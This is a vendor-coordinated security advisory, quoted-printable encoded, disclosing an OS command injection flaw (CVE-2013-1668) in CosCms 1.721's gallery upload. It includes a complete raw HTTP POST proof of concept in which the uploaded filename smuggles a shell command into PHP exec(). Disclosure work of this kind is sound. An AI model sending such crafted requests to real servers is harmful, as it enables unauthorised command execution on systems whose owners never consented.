Advisory ID: HTB23145
Product: CosCms
Vendor: http://www.coscms.org
Vulnerable Version(s): 1.721 and probably prior
Tested Version: 1.721
Vendor Notification: February 13, 2013=20
Vendor Patch: February 13, 2013=20
Public Disclosure: March 6, 2013=20
Vulnerability Type: OS Command Injection [CWE-78]
CVE Reference: CVE-2013-1668
Risk Level: High=20
CVSSv2 Base Score: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://w=
ww.htbridge.com/advisory/ )=20
---------------------------------------------------------------------------=
--------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in CosCms, =
which can be exploited to execute arbitrary OS commands on web server where=
the vulnerable application is hosted.
1) OS Command Injection in CosCms: CVE-2013-1668
Vulnerability exists due to insufficient validation of user-supplied input =
in "$_FILES['file']['name']" variable passed to "/gallery/upload/index" URL=
before using it in PHP "exec()" function. A remote attacker can send a spe=
cially crafted HTTP POST request containing a malicious filename, and execu=
te arbitrary commands on the target system with privileges of the web serve=
r.
The following PoC (Proof of Concept) code will write output of "ls -la" com=
mand into "/gallery/upload/file.txt" file. You can use any tool to send raw=
HTTP requests, e.g. telnet:
POST /gallery/upload/index HTTP/1.1
Content-Type: multipart/form-data; boundary=3D---------------------------21=
456260222104
Content-Length: 970
-----------------------------21456260222104
Content-Disposition: form-data; name=3D"title"
1
-----------------------------21456260222104
Content-Disposition: form-data; name=3D"image_add"
1
-----------------------------21456260222104
Content-Disposition: form-data; name=3D"description"
1
-----------------------------21456260222104
Content-Disposition: form-data; name=3D"tags"
-----------------------------21456260222104
Content-Disposition: form-data; name=3D"MAX_FILE_SIZE"
100000000
-----------------------------21456260222104
Content-Disposition: form-data; name=3D"APC_UPLOAD_PROGRESS"
511ad0922b50f
-----------------------------21456260222104
Content-Disposition: form-data; name=3D"file"; filename=3D"1 & ls -la > fil=
e.txt"
Content-Type: application/octet-stream
1
-----------------------------21456260222104
Content-Disposition: form-data; name=3D"submit"
Update
-----------------------------21456260222104--=09
Successful exploitation of this vulnerability requires an attacker to be lo=
gged-in and have privileges to upload files. User registration is disabled =
by default.
---------------------------------------------------------------------------=
--------------------
Solution:
Upgrade to CosCms 1.822
More Information:
http://www.coscms.org/blog/view/4/Version-1.822
https://github.com/diversen/gallery/blob/master/upload/index.php
https://github.com/diversen/gallery/commit/7d58f870e8edc6597485dd1b80ea9fb7=
8580190c
---------------------------------------------------------------------------=
--------------------
References:
[1] High-Tech Bridge Advisory HTB23145 - https://www.htbridge.com/advisory/=
HTB23145 - OS Command Injection in CosCms.
[2] CosCms - http://www.coscms.org/ - CosCMS is a simple framework for buil=
ding web application. It is intended for users, who wants some common modul=
es, and a platform with a small code base which is easy to extend.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - in=
ternational in scope and free for public use, CVE=C2=AE is a dictionary of =
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to =
developers and security practitioners, CWE is a formal list of software wea=
kness types.=20
---------------------------------------------------------------------------=
--------------------
Disclaimer: The information provided in this Advisory is provided "as is" a=
nd without any warranty of any kind. Details of this Advisory may be update=
d in order to provide as accurate information as possible. The latest versi=
on of the Advisory is available on web page [1] in the References.